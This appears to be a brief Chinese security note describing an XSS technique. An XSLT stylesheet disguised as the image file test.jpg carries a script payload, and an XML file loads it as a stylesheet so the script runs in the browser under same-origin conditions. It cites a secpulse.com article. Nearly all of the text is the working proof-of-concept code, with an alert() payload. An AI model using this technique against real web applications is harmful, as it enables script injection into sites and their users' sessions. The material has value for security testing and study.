利用条件:
1、满足同源策略
test.jpg
<?xml version="1.0" encoding="iso-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html><body>
<script>alert(/hacked by xsser/);</script>
</body></html>
</xsl:template>
</xsl:stylesheet>
alert.xml
<?xml version="1.0" encoding="iso-8859-1"?>
<?xml-stylesheet type="text/xsl" href="test.jpg"?>
<test></test>
参考文章:https://www.secpulse.com/archives/11520.html